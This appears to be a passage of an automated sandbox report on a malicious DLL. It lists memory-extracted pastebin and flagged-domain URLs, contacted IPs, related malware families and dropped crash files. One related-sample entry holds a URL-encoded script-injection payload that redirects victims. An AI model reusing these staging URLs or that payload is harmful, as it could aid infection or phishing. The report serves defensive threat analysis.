https://setember2024inf2.is-a-nurse.com:5002/02	rundll32.exe, 0000000D.00000002.3751406101.0000000005D6D000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://pastebin.com/_	rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf	5.dll	false		unknown
https://pastebin.com/raw/hQqNRrQtHu	rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/ZELZp1YrI%	rundll32.exe, 0000000D.00000002.3751406101.0000000005DF1000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://tools.ietf.org/html/rfc1321	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
http://www.schneier.com/paper-blowfish-fse.htmlS	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
http://upx.sf.net	Amcache.hve.25.dr	false	URL Reputation: safe	unknown
https://pastebin.com/5	rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
https://pastebin.com/raw/ZELZp1YrQu	rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://setember2024inf2.is-a-nurse.com:50K5	rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.indyproject.org/	rundll32.exe, 0000000A.00000002.3087009066.00000000063C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3072215647.0000000004E83000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000005093000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2998925851.0000000006810000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.3138224365.0000000006800000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004813000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3751406101.0000000005D50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004CC3000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3052031087.0000000006300000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2846831139.0000000006630000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000014.00000003.2660141145.00000000066F0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.3064367145.0000000006480000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004DF3000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false	URL Reputation: safe	unknown
https://pastebin.com/raw/ZELZp1Yrrt	rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://setember2024inf2.is-a-nurse.com:50	rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3751406101.0000000005DE3000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://tools.ietf.org/html/rfc4648S	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
https://pastebin.com/5_	rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com//	rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.itl.nist.gov/fipspubs/fip180-1.htm	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
https://pastebin.com/5$	rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
https://pastebin.com/5e	rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/i	rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.movable-type.co.uk/scripts/xxtea.pdfS	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
http://www.schneier.com/paper-twofish-paper.pdfS	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
https://pastebin.com/raw/ZELZp1YrEM$-	rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfU	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
https://pastebin.com/X	rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/V	rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.componentace.com	5.dll	false		unknown
https://pastebin.com/	rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/ZELZp1Yrl	rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/hQqNRrQt:u	rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/ZELZp1YrILE_X	rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/hQqNRrQt40	rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
https://pastebin.com/L	rundll32.exe, 0000000D.00000003.3721963112.000000000690C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000690C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3488118098.000000000690C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.ietf.org/rfc/rfc3447.txtS	rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	false		unknown
https://pastebin.com/I	rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States		13335	CLOUDFLARENETUS	true
208.109.246.134	setember2024inf2.is-a-nurse.com	United States		26496	AS-26496-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524659
Start date and time:	2024-10-03 03:30:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5.dll
Detection:	MAL
Classification:	mal92.troj.evad.winDLL@24/18@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:32:06	API Interceptor	1x Sleep call for process: loaddll32.exe modified
21:32:24	API Interceptor	188x Sleep call for process: rundll32.exe modified
21:33:46	API Interceptor	4x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.3.235	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
	SX8OLQP63C.exe	Get hash	malicious	VjW0rm, AsyncRAT, RATDispenser	Browse	pastebin.com/raw/V9y5Q5vv
	sostener.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Invoice-883973938.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	2024 12_59_31 a.m..js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	dropbox.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	dropbox.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	104.20.3.235
	q71n2VrEY3.exe	Get hash	malicious	DCRat	Browse	172.67.19.24
	lvHIHLt0b2.exe	Get hash	malicious	DCRat	Browse	104.20.3.235
	SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	envifa.vbs	Get hash	malicious	Unknown	Browse	172.67.19.24
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	104.20.4.235
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	172.67.19.24
	test.bat	Get hash	malicious	MicroClip	Browse	104.20.4.235

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	Globalfoundries.com_Report_46279.pdf	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://fpnc.vnvrff.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E	Get hash	malicious	Phisher	Browse	188.114.96.3
	https://porn-app.com/download2	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://perweierscotish.online/	Get hash	malicious	HtmlDropper	Browse	188.114.96.3
	Play_VM-NowCWhiteAudiowav012.html	Get hash	malicious	Tycoon2FA	Browse	188.114.96.3
	deveba=.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://orv-moers.powerappsportals.com/	Get hash	malicious	HtmlDropper	Browse	104.18.3.157
	https://www.kisa.link/dANpz	Get hash	malicious	Phisher	Browse	104.21.72.51
AS-26496-GO-DADDY-COM-LLCUS	shipping documents_pdf.exe	Get hash	malicious	FormBook	Browse	118.139.176.2
	https://sms.outrightmarketing.com/	Get hash	malicious	Unknown	Browse	50.62.142.2
	https://gemmni-lgi.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	https://coenbsasezprrolgenz.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	https://metamskli0n.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	https://geminloogi.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	https://mettamisk_signin.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	https://metta-massk-lggoinng.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	https://gemini_loggin.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	https://gemini_logip.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	104.20.3.235
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	104.20.3.235
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	104.20.3.235
	kUiqbpzmbo.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	C5Nbn7P6GJ.exe	Get hash	malicious	XRed, XWorm	Browse	104.20.3.235
	Setup.exe	Get hash	malicious	LummaC, MicroClip	Browse	104.20.3.235
	66fb252fe232b_Patksl.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.20.3.235
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	104.20.3.235
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.20.3.235
	lFsYXvJPWw.exe	Get hash	malicious	XRed	Browse	104.20.3.235

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c11fc434b2ae51c730bfcbd95eaf71498a857ba_7522e4b5_0fb7ab75-edfc-41bf-a9b9-14de17a46d00\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9478388874701529
Encrypted:	false
SSDEEP:	192:w1QiTOS570BU/wjeTs/EzuiFVZ24IO8dci:FiaS5IBU/wjejzuiFVY4IO8dci
MD5:	BFFC98D796D01633D46A8E84C44747F2
SHA1:	2101C612548479B75B5D14FC7E958F74FF61A8B4
SHA-256:	E5A16CED8E8BD64B4DB078527404B6705F7B9E381868118D35752A660D23F439
SHA-512:	47F5F5AD4CED68C17263D01ADC3D55EE77FFE497002A2F8011F6BDFBA6FF2B9B6D0233885459B0A94673B97E12003BCCABCE9DC37E264DF5B3CF68311CCFF19F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.8.3.9.6.3.7.3.9.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.8.4.0.2.7.8.0.6.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.b.7.a.b.7.5.-.e.d.f.c.-.4.1.b.f.-.a.9.b.9.-.1.4.d.e.1.7.a.4.6.d.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.c.e.3.6.8.9.-.5.b.3.a.-.4.2.e.7.-.b.b.8.e.-.1.3.f.9.f.1.a.7.e.c.5.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.4.-.0.0.0.1.-.0.0.1.3.-.a.3.6.6.-.2.2.e.8.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c11fc434b2ae51c730bfcbd95eaf71498a857ba_7522e4b5_42576753-4178-4839-8eac-13ee23643e2c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9479305448098375
Encrypted:	false
SSDEEP:	192:wt23i1OI570BU/wjeTsuzzuiFVZ24IO8dci:QEisI5IBU/wjeDzuiFVY4IO8dci
MD5:	32CDFA5D1858EF7EB9CC063A2444BCA4
SHA1:	9D04A0AE08B39204A843D85FABE6881AF64FAFA0
SHA-256:	4C95778A2D9AD7F303DB1CD8AA0CEB54040339F413095E1D61591B6EB5A80E42
SHA-512:	1B650486C8F2E3455F76B4448BAE66ED17C18CF3E63A7283B80046CF3C6B751A95914701DBB3927B791F48754E15F12CB08B6212B3858636EEC933CF68873557
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.8.2.9.0.8.9.0.1.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.8.3.1.9.3.2.9.0.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.5.7.6.7.5.3.-.4.1.7.8.-.4.8.3.9.-.8.e.a.c.-.1.3.e.e.2.3.6.4.3.e.2.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.1.5.f.c.f.7.d.-.c.9.7.f.-.4.7.f.9.-.a.4.0.6.-.c.e.d.e.b.e.7.4.c.3.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.4.-.0.0.0.1.-.0.0.1.3.-.1.c.d.b.-.7.2.0.e.3.4.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f48ee1d79ba125ec73679e59d0b16d42546ec4d_7522e4b5_256b9362-2db3-403a-a4b5-8296c3b6906c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9535388475359374
Encrypted:	false
SSDEEP:	192:sUtiLOn5S0BU/wjeTsuzzuiFVZ24IO84ci:ttiSn5ZBU/wjeDzuiFVY4IO84ci
MD5:	B845E993815F5903BC50FA3B11159931
SHA1:	0CF382A0C21D8521999A7E8B46260836F8D460CC
SHA-256:	867DF3683AC71306DBD175724D4E2BFF4F6BA36CBA5FCC1DB85F0ADCF432312E
SHA-512:	D9D52EF50F2841C442A125CE22EA4042B54758AAF265469D5F402D0D3839DC1440094E489A639887116E11EA18468FCE6A51A905A1808D92DFD638FF13E48518
Malicious:	false
